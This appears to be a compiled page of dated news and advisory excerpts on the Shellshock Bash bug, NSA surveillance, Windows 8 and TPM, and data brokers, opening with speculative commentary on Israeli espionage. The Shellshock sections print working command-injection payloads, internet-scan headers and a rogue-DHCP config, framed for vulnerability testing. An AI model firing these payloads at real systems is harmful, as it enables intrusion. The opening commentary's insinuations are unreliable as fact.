U.S. Navy submariner Ariel Weinmann was arrested and detained as a spy for Israel in 2006 when he reportedly deserted from his unit (USS ALBUQUERQUE) taking with him a laptop computer which held classified information. He was believed to have met with an agent of a foreign power in Vienna and in Mexico City. Initial reports said that power was Israel. Later, after the allies had time to get their heads together and agree on a cover story, Time Magazine broke a story which put it out there, with no substantiation whatsoever, that the foreign power implicated had actually been – wait for it – Russia. He probably had just become confused because Jerusalem and Moscow have almost the same working hours. Weinmann is apparently not Jewish, by the way, the name is of German extraction, or so his father says. He was alleged, by his father, to have been upset because of the USA collecting intelligence information on its allies. So, if you’re still following the storyline, Weinmann – after a naval deployment to the Persian Gulf where the Navy upset him by collecting intelligence information on its allies – stole a laptop containing classified information which presumably proved his case, and disclosed that information to…Russia. Uh huh. A nation which is not only not an ally of the United States – pretty damned far from it, in fact – but one which has no serious naval profile in the Persian Gulf. I feel kind of like I’m running on a giant pretzel.

More recently, in May of this year, Newsweek announced despairingly that Israel will not stop spying on the USA, and the USA will not make them stop. In this article, which accuses Israel of constantly maneuvering to steal American technology and industrial secrets, Israel’s espionage activities are described as “unrivaled and unseemly”. Comically, Israeli Embassy spokesman Aaron Sagui retorted angrily, “Israel doesn’t conduct espionage operations in the United States, period. We condemn the fact that such outrageous, false allegations are being directed against Israel.” No word on whether his nose immediately grew so rapidly that it put the reporter’s eye out, because Israel has already admitted to and apologized for espionage activities in the United States before.

Which brings us back to FireEye, speaking of Pinocchio. FireEye, frankly, needs a big break. Its stock is sinking as other Threat Detection commercial security companies muscle in on the market, and in May was down 65% from a 52-week high, while investors were getting impatient to see some success.

A success like this one, in fact.

Let’s go back a minute to the giddy summary by the FireEye executive cited earlier. “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.”

You know why the conclusion is unavoidable? Because the malicious code is specifically engineered to point in that direction. Who would do that? Russians who meant it to be undetectable?

You tell me.

[Oct 03, 2014] Everything you need to know about the Shellshock Bash bug

September 25, 2014 | troyhunt.com
Remember Heartbleed? If you believe the hype today, Shellshock is in that league and with an equally awesome name albeit bereft of a cool logo (someone in the marketing department of these vulns needs to get on that). But in all seriousness, it does have the potential to be a biggie and as I did with Heartbleed, I wanted to put together something definitive both for me to get to grips with the situation and for others to dissect the hype from the true underlying risk.

To set the scene, let me share some content from Robert Graham’s blog post; he has been doing some excellent analysis on this. His Internet-wide scan issued HTTP requests carrying the Shellshock payload in several headers, driven by a scan configuration like this:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Which, when issued against a range of vulnerable IP addresses, results in this:

[Oct 03, 2014] Shellshock (software bug)

en.wikipedia.org

Analysis of the source code history of Bash shows that the vulnerabilities had existed undiscovered since approximately version 1.13 in 1992.[4] The maintainers of the Bash source code have difficulty pinpointing the time of introduction due to the lack of comprehensive changelogs.[1]

In Unix-based operating systems, and in other operating systems that Bash supports, each running program has its own list of name/value pairs called environment variables. When one program starts another program, it provides an initial list of environment variables for the new program.[14] Separately from these, Bash also maintains an internal list of functions, which are named scripts that can be executed from within the program.[15] Since Bash operates both as a command interpreter and as a command, it is possible to execute Bash from within itself. When this happens, the original instance can export environment variables and function definitions into the new instance.[16] Function definitions are exported by encoding them within the environment variable list as variables whose values begin with parentheses ("()") followed by a function definition. The new instance of Bash, upon starting, scans its environment variable list for values in this format and converts them back into internal functions. It performs this conversion by creating a fragment of code from the value and executing it, thereby creating the function "on-the-fly", but affected versions do not verify that the fragment is a valid function definition.[17] Therefore, given the opportunity to execute Bash with a chosen value in its environment variable list, an attacker can execute arbitrary commands or exploit other bugs that may exist in Bash's command interpreter.
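The export mechanism described above can be observed directly from the command line. This is a minimal sketch using an invented function name, `greet`; on pre-patch versions of Bash the exported function traveled as an environment variable literally named `greet` whose value begins with "() {", while patched versions use specially encoded variable names precisely so that ordinary variables can no longer be mistaken for function definitions.

```shell
# Define a function in the parent shell and export it, so that a
# child bash instance reconstructs and runs it.
greet() { echo "hello from parent"; }
export -f greet

# The child bash scans its environment, finds the encoded function
# definition, and recreates greet() before running the command.
bash -c 'greet'
```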

The name "shellshock" is attributed to Andreas Lindh, from a tweet on 24 September 2014.

On October 1st, Zalewski released details of the final bugs, and confirmed that Florian Weimer's patch does indeed prevent them.

CGI-based web server attack

When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one, for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request.[4] The security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely dangerous if they are not carefully checked."[20] Other methods of handling web server requests are also often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.
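The CGI hand-off can be simulated locally without a web server. This is a sketch only: the variable name follows the CGI convention, and `echo handler output` stands in for a real request handler. The crafted "header" value is placed into the environment exactly as a CGI server would do, and a child bash is invoked.

```shell
# Place an attacker-controlled "header" into the environment, as a
# CGI web server would, then invoke a bash handler.
# Unpatched bash: imports the value as a function and prints INJECTED
# before the handler output.
# Patched bash: treats it as an ordinary variable and prints only the
# handler output.
env 'HTTP_USER_AGENT=() { :;}; echo INJECTED' bash -c 'echo handler output'
```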

SSH server example

OpenSSH has a "ForceCommand" feature, where a fixed command is executed when the user logs in, instead of just running an unrestricted command shell. The fixed command is executed even if the user specified that another command should be run; in that case the original command is put into the environment variable "SSH_ORIGINAL_COMMAND". When the forced command is run in a Bash shell (if the user's shell is set to Bash), the Bash shell will parse the SSH_ORIGINAL_COMMAND environment variable on start-up, and run the commands embedded in it. The user has used their restricted shell access to gain unrestricted shell access, using the Shellshock bug.[21]
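A hypothetical sshd_config fragment illustrates the setup (the user name and script path are invented for illustration). With this configuration, a command supplied by the client, e.g. `ssh backup@host '() { :;}; id'`, is not executed directly: sshd places it in SSH_ORIGINAL_COMMAND and runs the forced command via the user's login shell, so a vulnerable bash parses the crafted value at startup.

```
# Hypothetical sshd_config excerpt: restrict an account to one command.
Match User backup
    ForceCommand /usr/local/bin/backup-only.sh
```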

DHCP example

Some DHCP clients can also pass commands to Bash; a vulnerable system could be attacked when connecting to an open Wi-Fi network. A DHCP client typically requests and gets an IP address from a DHCP server, but it can also be provided a series of additional options. A malicious DHCP server could provide, in one of these options, a string crafted to execute code on a vulnerable workstation or laptop.[9]
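As an illustration only, a rogue DHCP server could be sketched with dnsmasq along the following lines. The option number and the payload string are invented for this example, and whether a given client ever hands a particular option value to a shell depends entirely on that client's hook scripts; the point is merely that DHCP option values are attacker-chosen strings delivered to the client.

```
# Hypothetical rogue-DHCP sketch (dnsmasq syntax); illustrative only.
dhcp-range=192.168.0.50,192.168.0.150,12h
dhcp-option-force=114,"() { :; }; /bin/touch /tmp/shellshock-poc"
```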

Note of offline system vulnerability

The bug can potentially affect machines that are not directly connected to the Internet when they perform offline processing that involves Bash.

Initial report (CVE-2014-6271)

This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[22] The vulnerability can be tested with the following command:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

In systems affected by the vulnerability, the above command will display the word "vulnerable" as a result of Bash executing the command "echo vulnerable", which was embedded into the specially crafted environment variable named "x".[24]
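Conversely, on a patched system the crafted variable is simply ignored as a function definition, so only the test string appears:

```shell
# Patched bash treats x as an ordinary environment variable; the
# embedded "echo vulnerable" is never executed.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
# prints: this is a test
```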

There was an initial report of the bug made to the maintainers of Bash (Report# CVE-2014-6271). The bug was corrected with a patch to the program. However, after the release of the patch there were subsequent reports of different, yet related vulnerabilities. On 26 September 2014, two open-source contributors, David A. Wheeler and Norihiro Tanaka, noted that there were additional issues, even after patching systems using the most recently available patches. In an email addressed to the oss-sec list and the bash bug list, Wheeler wrote: "This patch just continues the 'whack-a-mole' job of fixing parsing errors that began with the first patch. Bash's parser is certain [to] have many many many other vulnerabilities".[25]
On 27 September 2014, Michal Zalewski announced his discovery of several other Bash vulnerabilities,[26] one based upon the fact that Bash is typically compiled without address space layout randomization.[27] Zalewski also strongly encouraged all concerned to immediately apply a patch made available by Florian Weimer.[27]

CVE-2014-6277

CVE-2014-6277 relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29]

The following input causes a segmentation fault in unpatched Bash:

() { x() { _; }; x() { _; } <<a; }

CVE-2014-6278

CVE-2014-6278 also relates to the parsing of function definitions in environment variables by Bash. It was discovered by Michał Zalewski.[29] The following crafted value causes an unpatched Bash to execute the trailing commands:

() { _; } >_[$($())] { echo hi mom; id; }

CVE-2014-7169

On the same day the bug was published, Tavis Ormandy discovered a related bug, which was assigned the CVE identifier CVE-2014-7169.[21] Official and distribution patches for it began to be released on 26 September 2014. It is demonstrated in the following code:

env X='() { (a)=>\' sh -c "echo date"; cat echo

which triggers a bug in Bash, causing the command "date" to execute unintentionally.[21]

Testing example

Here is an example of a system that has a patch for CVE-2014-6271 but not CVE-2014-7169:

$ X='() { (a)=>\' bash -c "echo date"
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
$ cat echo
Fri Sep 26 01:37:16 UTC 2014

The patched system displays the same error, notifying the user that CVE-2014-6271 has been prevented. However, the attack causes a file named 'echo' to be written into the working directory, containing the result of the 'date' call. The existence of this issue resulted in the creation of CVE-2014-7169 and the release of patches for several systems.

A system patched for both CVE-2014-6271 and CVE-2014-7169 will simply echo the word "date" and the file "echo" will not be created.

$ X='() { (a)=>\' bash -c "echo date"
date
$ cat echo
cat: echo: No such file or directory

CVE-2014-7186

CVE-2014-7186 relates to an out-of-bounds memory access error in the Bash parser code.[31] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]

Testing example

Here is an example of the vulnerability, which leverages the use of multiple "<<EOF" declarations:

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"

A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".

CVE-2014-7187

CVE-2014-7187 relates to an off-by-one error, allowing out-of-bounds memory access, in the Bash parser code.[32] While working on patching Shellshock, Red Hat researcher Florian Weimer found this bug.[23]

Testing example

Here is an example of the vulnerability, which leverages the use of multiple "done" declarations:

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"

A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
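For convenience, the two most serious probes above can be wrapped into one check script. This is an informal sketch, not an official test suite; it reports a verdict per CVE for the Bash binary found on the PATH:

```shell
# Sketch of a combined checker for the two most serious issues.
probe_6271() {
    # Unpatched Bash runs the "echo vulnerable" payload while importing x.
    out=$(env x='() { :;}; echo vulnerable' bash -c : 2>/dev/null)
    if [ "$out" = "vulnerable" ]; then
        echo "CVE-2014-6271: VULNERABLE"
    else
        echo "CVE-2014-6271: not vulnerable"
    fi
}

probe_7169() {
    # Unpatched Bash leaves a file named "echo" in the working directory.
    tmp=$(mktemp -d) || return 1
    ( cd "$tmp" && env X='() { (a)=>\' bash -c "echo date" >/dev/null 2>&1 )
    if [ -e "$tmp/echo" ]; then
        echo "CVE-2014-7169: VULNERABLE"
    else
        echo "CVE-2014-7169: not vulnerable"
    fi
    rm -rf "$tmp"
}

probe_6271
probe_7169
```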

Frequently Asked Questions about the Shellshock Bash flaws

Sep 26, 2014 | securityblog.redhat.com

Why are there four CVE assignments?

The original flaw in Bash was assigned CVE-2014-6271. Shortly after that issue went public a researcher found a similar flaw that wasn’t blocked by the first fix and this was assigned CVE-2014-7169. Later, Red Hat Product Security researcher Florian Weimer found additional problems and they were assigned CVE-2014-7186 and CVE-2014-7187. It’s possible that other issues will be found in the future and assigned a CVE designator even if they are blocked by the existing patches.

... ... ...

Why is Red Hat using a different patch than others?

Our patch addresses the CVE-2014-7169 issue in a much better way than the upstream patch; we wanted to make sure the issue was properly dealt with.

I have deployed web application filters to block CVE-2014-6271. Are these filters also effective against the subsequent flaws?

If configured properly and applied to all relevant places, the “() {” signature will work against these additional flaws.
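The same "() {" signature is also useful after the fact: web access logs can be searched for it to spot probes that have already arrived. A minimal sketch (the log path is an assumption; adjust for your distribution):

```shell
# Search an access log for the Shellshock signature "() {".
# /var/log/httpd/access_log is an assumed Red Hat-style location.
log="${1:-/var/log/httpd/access_log}"
if [ -r "$log" ]; then
    grep -F '() {' "$log" || echo "no Shellshock probes found in $log"
else
    echo "cannot read $log"
fi
```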

Does SELinux help protect against this flaw?

SELinux can help reduce the impact of some of the exploits for this issue. SELinux guru Dan Walsh has written about this in depth in his blog.

Are you aware of any new ways to exploit this issue?

Within a few hours of the first issue being public (CVE-2014-6271), various exploits were seen live; they attacked the services we identified as at risk in our first post.

We did not see any exploits which were targeted at servers which had the first issue fixed, but were affected by the second issue. We are currently not aware of any exploits which target bash packages which have both CVE patches applied.

Why wasn’t this flaw noticed sooner?

The flaws in Bash were in a quite obscure feature that was rarely used; it is not surprising that this code had not been given much attention. When the first flaw was discovered it was reported responsibly to vendors who worked over a period of under 2 weeks to address the issue.

This entry was posted in Vulnerabilities by Huzaifa Sidhpurwala and tagged bash, CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, shellshocked.

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Update 2014-09-25 16:00 UTC

Red Hat is aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.

We are working on patches in conjunction with the upstream developers as a critical priority. For details on a workaround, please see the knowledgebase article.

Red Hat advises customers to upgrade to the version of Bash which contains the fix for CVE-2014-6271 and not wait for the patch which fixes CVE-2014-7169. CVE-2014-7169 is a less severe issue and patches for it are being worked on.


Bash, or the Bourne-Again Shell, is a Unix-like shell and perhaps one of the most widely installed utilities on any Linux system. Since its creation in 1989, Bash has evolved from a simple terminal-based command interpreter into a tool embedded in many other contexts.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name with a value assigned to it. The same is true of the Bash shell. It is common for many programs to run the Bash shell in the background. It is often used to provide a shell to a remote user (via ssh or telnet, for example), to provide a parser for CGI scripts (Apache, etc.) or even to provide limited command execution support (git, etc.).
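A one-line illustration of that inheritance: a variable placed in the environment of a child Bash is visible inside it.

```shell
# The child Bash process inherits GREETING from its environment.
GREETING="hello" bash -c 'echo "$GREETING world"'   # prints "hello world"
```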

Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the Bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts.

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these Bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable). Something like:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 vulnerable
 this is a test
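Exporting functions through the environment is itself a legitimate, if obscure, Bash feature (via the export -f builtin option); the flaw lay only in how the imported value was parsed. A minimal sketch of the legitimate mechanism:

```shell
# Bash serializes an exported function into the environment so that a
# child Bash can re-import and call it.
bash -c 'greet() { echo "hello from an exported function"; }
         export -f greet
         bash -c greet'
```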

The patch used to fix this flaw ensures that no code is allowed after the end of a Bash function definition. So if you run the above example with a patched version of Bash, you should get output similar to:

 $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test

We believe this should not affect backward compatibility. It would, of course, affect any scripts which try to use environment variables created in the way described above, but doing so should be considered bad programming practice.

Red Hat has issued security advisories that fix this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fix this issue.

We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723

Information on CentOS can be found at http://lists.centos.org/pipermail/centos/2014-September/146099.html.


[Sep 29, 2014] Shellshock: How to protect your Unix, Linux and Mac servers By Steven J. Vaughan-Nichols

Fortunately, all the major Linux vendors quickly issued patches, including Debian, Ubuntu, Suse and Red Hat.
zdnet.com

The only thing you have to fear with Shellshock, the Unix/Linux Bash security hole, is fear itself. Yes, Shellshock can serve as a highway for worms and malware to hit your Unix, Linux, and Mac servers, but you can defend against it.

The real and present danger is for servers. According to the National Institute of Standards and Technology (NIST), Shellshock scores a perfect 10 for potential impact and exploitability. Red Hat reports that the most common attack vectors are Web servers running CGI scripts, SSH servers, and DHCP clients.

So much for Red Hat's thoughts. Of these, the Web servers and SSH are the ones that worry me the most. The DHCP client is also troublesome, especially if, as is the case with small businesses, your external router doubles as your Internet gateway and DHCP server.

Of these, Web server attacks seem to be the most common by far. As Florian Weimer, a Red Hat security engineer, wrote: "HTTP requests to CGI scripts have been identified as the major attack vector." Attacks are being made against systems running both Linux and Mac OS X.
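The CGI vector can be simulated without a web server. Per the CGI specification, the server copies request headers into environment variables such as HTTP_USER_AGENT before invoking the script, so a crafted User-Agent header lands directly in the environment of a Bash CGI script:

```shell
# Local simulation of the CGI vector: the web server would export the
# attacker-controlled User-Agent header as HTTP_USER_AGENT and then run
# the CGI script under Bash. Unpatched Bash runs the payload at startup.
env 'HTTP_USER_AGENT=() { :;}; echo payload executed' bash -c 'echo serving CGI request'
```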

Jaime Blasco, labs director at AlienVault, a security management services company, ran a honeypot looking for attackers and found "several machines trying to exploit the Bash vulnerability. The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system."

Other security researchers have found that the malware is the usual sort. They typically try to plant distributed denial of service (DDoS) IRC bots and attempt to guess system logins and passwords using a list of poor passwords such as 'root', 'admin', 'user', 'login', and '123456.'

So, how do you know if your servers can be attacked? First, you need to check to see if you're running a vulnerable version of Bash. To do that, run the following command from a Bash shell:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If you get the result:

vulnerable
this is a test

Bad news: your version of Bash can be hacked. If you see:

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

You're good. Well, to be more exact, you're as protected as you can be at the moment.

http://support.novell.com/security/cve/CVE-2014-6271.html

Updated information on the bash fixes.
Sep 26, 2014 | support.novell.com

We have fixed the critical issue CVE-2014-6271 (http://support.novell.com/security/cve/CVE-2014-6271.html) with updates for all supported and LTSS code streams.

SLES 10 SP3 LTSS, SP4 LTSS, SLES 11 SP1 LTSS, SLES 11 SP2 LTSS, SLES 11 SP3, openSUSE 12.3, 13.1.

The issue CVE-2014-7169 (http://support.novell.com/security/cve/CVE-2014-7169.html) is less severe (no trivial code execution) but will also receive fixes for the above. As more patches are under discussion around the bash parser, we will wait some days to collect them to avoid a third bash update.

[Jan 08, 2014] German Government CONFIRMS Key Entities Not To Use Windows 8 with TPM 2.0, Fearing Control by ‘Third Parties’ (Such As NSA) by Wolf Richter

08/26/2013 | www.testosteronepit.com

I expected the German Federal Office for Security in Information Technology (BSI) to contact me in an icily polite but firm manner and make me recant, and I almost expected some goons to show up with an offer I couldn’t refuse, and I half expected Microsoft to shut down my computers remotely and wipe out all my data and make me, as the Japanese say, cry into my pillow for weeks, or something. But none of that happened.

Instead, the BSI officially confirmed on its website the key statements in what has become my most popular article ever. On my humble site alone, it has been read over 44,000 times so far, received over 2,090 Facebook “likes,” and been tweeted over 530 times. Here it is: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.

Internal documents from the BSI that were leaked to Die Zeit described how Windows 8 in conjunction with the new Trusted Platform Module (TPM 2.0) – “a special surveillance chip,” it has been called – allowed Microsoft to control computers remotely through a built-in backdoor without possibility for the user to opt in or opt out. The goal is Digital Rights Management and computer security. Through remote access via this backdoor, Microsoft determines what software is allowed to run on the computer, and what software, such as illegal copies or viruses and Trojans, should be disabled. Keys to that backdoor are likely accessible to the NSA – and in an ironic twist, perhaps even to the Chinese.

Users of Windows 8 with TPM 2.0 (the standard configuration and not an option) surrender control over their machine the moment they turn it on. For that reason, according to the leaked documents, experts at the BSI warned the German Federal Administration and other key users against deploying computers with Windows 8 and TPM 2.0.

The BSI could have brushed off these leaked documents as fakes or rumors, or whatnot. But instead, in response to “media reports,” it decided to clarify a few points on its website, and in doing so, confirmed the key elements. Here are the salient points:

For specific user groups, the use of Windows 8 in combination with TPM may well mean an increase in security. This includes users who, for various reasons, cannot or do not want to take care of the security of their system, but trust that the manufacturer of the system provides and maintains a secure solution. This is a valid user scenario, but the manufacturer should provide sufficient transparency about the potential limitations of the architecture and possible consequences of its use.

From the perspective of the BSI, the use of Windows 8 in combination with TPM 2.0 is accompanied by a loss of control over the operating system and the hardware. This results in new risks for the user, specifically for the Federal Administration and critical infrastructure.

It explains how “unintentional errors” could cause hardware and software to become permanently useless, which “would not be acceptable” for the Federal Administration or for other users. “In addition, the newly established mechanisms can also be used for sabotage by third parties.”

Among them: the NSA and possibly the Chinese.

The BSI considers complete control over the information technology – including a conscious opt-in and later the possibility of an opt-out – a fundamental condition for a responsible use of hardware and operating system.

Since these conditions have not been met, the BSI has warned the “Federal Administration and critical infrastructure users” not to use the Windows 8 with TPM 2.0. The BSI said that it remained in contact with the Trusted Computing Group as well as with makers of operating systems and hardware “in order to find appropriate solutions” (whole text in German).

This alleged connection between Windows and the NSA isn’t new. Geeks have for years tried to document how Microsoft has been cooperating with the NSA and other members of the US Intelligence Community in designing its operating systems. For example, rumors bubbled up in 2007 that computers with Vista, at the time Microsoft’s latest and greatest (and much despised) operating system, automatically established a connection to, among others, the Department of Defense Information Center and Halliburton Company, back then the Darth Vader of Corporate America.

The Windows 8 debacle comes on top of the breathless flow of Edward Snowden’s revelations and paints a much more detailed picture of how the NSA’s spying activities depend on Corporate America. These revelations are already slamming tech companies [my take: US Tech Companies Raked Over The Coals In China ] as they find it harder to sell their allegedly compromised products overseas. Which foreign government or corporation would now want to use Windows 8 with TPM 2.0?

Or is this – and the entire hullabaloo about the Snowden revelations – just another item in the governmental and corporate category of “This Too Shall Pass?” The answer lies in this paragraph:

No laws define the limits of the NSA’s power. No Congressional committee subjects the agency’s budget to a systematic, informed and skeptical review. With unknown billions of Federal dollars, the agency purchases the most sophisticated communications and computer equipment in the world. But truly to comprehend the growing reach of this formidable organization, it is necessary to recall once again how the computers that power the NSA are also gradually changing lives of Americans....

The year? Not 2013. But thirty years ago.

It was published by the New York Times in 1983, adapted from David Burnham’s book, The Rise of the Computer State [brought to my attention by @mark_white0]. And we’re still going down the same road. Only now, we’re a lot further along. No wonder that tech companies, government agencies, and Congress alike think that this too shall pass. Because it has always done so before.

So, here is my offending article: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.

Author webpage: www.amazon.com/author/wolfrichter

[Jan 08, 2014] Apple Says It Is ‘Unaware’ of N.S.A. iPhone Hack Program By NICOLE PERLROTH

"It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea)."

Dec 31, 2013 | NYT

The agency described DROPOUTJEEP as a “software implant for Apple iPhone” that has all kinds of handy spy capabilities. DROPOUTJEEP can pull or push information onto the iPhone, snag SMS text messages, contact lists, voicemail and a person’s geolocation, both from the phone itself and from cell towers in close proximity.

It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea).

But the Der Spiegel report is based on information that is over five years old. The slide, dated January 2007 and last updated October 2008, claims that the agency requires close physical proximity to the iPhone to install DROPOUTJEEP.

“The initial release of DROPOUTJEEP will focus on installing the implant via close access methods,” the N.S.A. slide says. Then, “A remote installation capability will be pursued for a future release.”

Based on the timing of the report, the agency would have been targeting Apple’s iOS5 operating system. Apple released its latest iOS7 operating system last September.

[Dec 27, 2013] N.S.A. Phone Surveillance Is Lawful, Federal Judge Rules

In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”
NYTimes.com

The main dispute between Judge Pauley and Judge Leon was over how to interpret a 1979 Supreme Court decision, Smith v. Maryland, in which the court said a robbery suspect had no reasonable expectation that his right to privacy extended to the numbers dialed from his phone.

“Smith’s bedrock holding is that an individual has no legitimate expectation of privacy in information provided to third parties,” Judge Pauley wrote.

But Judge Leon said in his ruling that advances in technology and suggestions in concurring opinions in later Supreme Court decisions had undermined Smith. The government’s ability to construct a mosaic of information from countless records, he said, called for a new analysis of how to apply the Fourth Amendment’s prohibition of unreasonable government searches.

Judge Pauley disagreed. “The collection of breathtaking amounts of information unprotected by the Fourth Amendment does not transform that sweep into a Fourth Amendment search,” he wrote.

He acknowledged that “five justices appeared to be grappling with how the Fourth Amendment applies to technological advances” in a pair of 2012 concurrences in United States v. Jones. In that decision, the court unanimously rejected the use of a GPS device to track the movements of a drug suspect over a month. The majority in the 2012 case said that attaching the device violated the defendant’s property rights.

In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”

But Judge Pauley wrote that the 2012 decision did not overrule the one from 1979. “The Supreme Court,” he said, “has instructed lower courts not to predict whether it would overrule a precedent even if its reasoning has been supplanted by later cases.”

As for changes in technology, he wrote, customers’ “relationship with their telecommunications providers has not changed and is just as frustrating.”

[Dec 27, 2013] What Surveillance Valley knows about you By Yasha Levine

December 22, 2013 Crooks and Liars

“In 2012, the data broker industry generated $150 billion in revenue. That’s twice the size of the entire intelligence budget of the United States government, all generated by the effort to detail and sell information about our private lives.”
Senator Jay Rockefeller IV

“Quite simply, in the digital age, data-driven marketing has become the fuel on which America’s free market engine runs.”

Direct Marketing Association

* * *

Google is very secretive about the exact nature of its for-profit intel operation and how it uses the petabytes of data it collects on us every single day for financial gain. Fortunately, though, we can get a sense of the kind of info that Google and other Surveillance Valley megacorps compile on us, and the ways in which that intel might be used and abused, by looking at the business practices of the “data broker” industry.

Thanks to a series of Senate hearings, the business of data brokerage is finally being understood by consumers, but the industry got its start back in the 1970s as a direct outgrowth of the failure of telemarketing. In its early days, telemarketing had an abysmal success rate: only 2 percent of people contacted would become customers. In his book, “The Digital Person,” Daniel J. Solove explains what happened next:

To increase the low response rate, marketers sought to sharpen their targeting techniques, which required more consumer research and an effective way to collect, store, and analyze information about consumers. The advent of the computer database gave marketers this long sought-after ability — and it launched a revolution in targeting technology.

Data brokers rushed in to fill the void. These operations pulled in information from any source they could get their hands on — voter registration, credit card transactions, product warranty information, donations to political campaigns and non-profits, court records — storing it in master databases and then analyzing it in all sorts of ways that could be useful to direct-mailing and telemarketing outfits. It wasn’t long before data brokers realized that this information could be used beyond telemarketing, and quickly evolved into a global for-profit intelligence business that serves every conceivable data and intelligence need.

Today, the industry generates somewhere around $200 billion in revenue annually. There are up to 4,000 data broker companies — some of the biggest are publicly traded — and together, they have detailed information on just about every adult in the western world.

No source of information is sacred: transaction records are bought in bulk from stores, retailers and merchants; magazine subscriptions are recorded; food and restaurant preferences are noted; public records and social networks are scoured and scraped. What kind of prescription drugs did you buy? What kind of books are you interested in? Are you a registered voter? To what non-profits do you donate? What movies do you watch? Political documentaries? Hunting reality TV shows?

That info is combined and kept up to date with address, payroll information, phone numbers, email accounts, social security numbers, vehicle registration and financial history. And all that is sliced, isolated, analyzed and mined for data about you and your habits in a million different ways.

The dossiers are not restricted to generic market segmenting categories like “Young Literati” or “Shotguns and Pickups” or “Kids & Cul-de-Sacs,” but often contain the most private and intimate details about a person’s life, all of it packaged and sold over and over again to anyone willing to pay.

Take MEDbase200, a boutique for-profit intel outfit that specializes in selling health-related consumer data. Well, until last week, the company offered its clients a list of rape victims (or “rape sufferers,” as the company calls them) at the low price of $79.00 per thousand. The company claims to have segmented this data set into hundreds of different categories, including stuff like the ailments they suffer, prescription drugs they take and their ethnicity:

These rape sufferers are family members who have reported, or have been identified as individuals affected by specific illnesses, conditions or ailments relating to rape. Medbase200 is the owner of this list. Select from families affected by over 500 different ailments, and/or who are consumers of over 200 different Rx medications. Lists can be further selected on the basis of lifestyle, ethnicity, geo, gender, and much more. Inquire today for more information.

MEDbase promptly took its “rape sufferers” list off line last week after its existence was revealed in a Senate investigation into the activities of the data-broker industry. The company pretended like the list was a huge mistake. A MEDbase rep tried convincing a Wall Street Journal reporter that its rape dossiers were just a “hypothetical list of health conditions/ailments.” The rep promised it was never sold to anyone. Yep, it was a big mistake. We can all rest easy now. Thankfully, MEDbase has hundreds of other similar dossier collections, hawking the most private and sensitive medical information.

For instance, if lists of rape victims aren’t your thing, MEDbase can sell dossiers on people suffering from anorexia, substance abuse, AIDS and HIV, Alzheimer’s Disease, Asperger Disorder, Attention Deficit Hyperactivity Disorder, Bedwetting (Enuresis), Binge Eating Disorder, Depression, Fetal Alcohol Syndrome, Genital Herpes, Genital Warts, Gonorrhea, Homelessness, Infertility, Syphilis… the list goes on and on and on and on.

Normally, such detailed health information would fall under federal law and could not be disclosed or sold without consent. But because these data harvesters rely on indirect sources of information instead of medical records, they’re able to sidestep regulations put in place to protect the privacy of people’s health data.

